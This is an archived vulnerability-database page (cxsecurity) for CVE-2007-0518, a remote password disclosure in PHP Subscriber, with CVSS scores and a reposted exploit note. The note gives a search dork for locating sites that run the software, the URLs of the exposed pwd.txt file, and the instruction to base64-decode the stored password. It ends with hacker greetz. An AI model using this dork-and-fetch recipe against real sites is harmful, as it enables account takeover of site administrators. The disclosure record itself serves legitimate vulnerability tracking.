Bug: PHP Subscriber (pwd.txt) Remote Password Disclosur ( Ascii Version )

Search:
WLB2

PHP Subscriber (pwd.txt) Remote Password Disclosur

Published
Credit
Risk
2007.01.28
The Tiger 100
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-0518
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

########################################################################
#############
#subscribe (pwd.txt) Remote Password Disclosur
########################################################################
#############
#
#D0rk = "Powered By PHP Subscriber"
#
#
#discovered by : ThE TiGeR 100
#
########################################################################
#############
#Exploit :
#
#http://www.site.com/[path]/pwd.txt
#
#or
#
#http://www.site.com/pwd.txt
#
#then crack the password with bass64 decode ,,the password is coded by base64 not hash
#
########################################################################
#############
#
#Contact:the.tiger100 (at) gmail (dot) com [email concealed]
#
#
#GreetZ to str0k ;)
#
# Your Time is UpMy Time Is Now,
# You Can't See Me My Time Is Now
########################################################################
#############

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version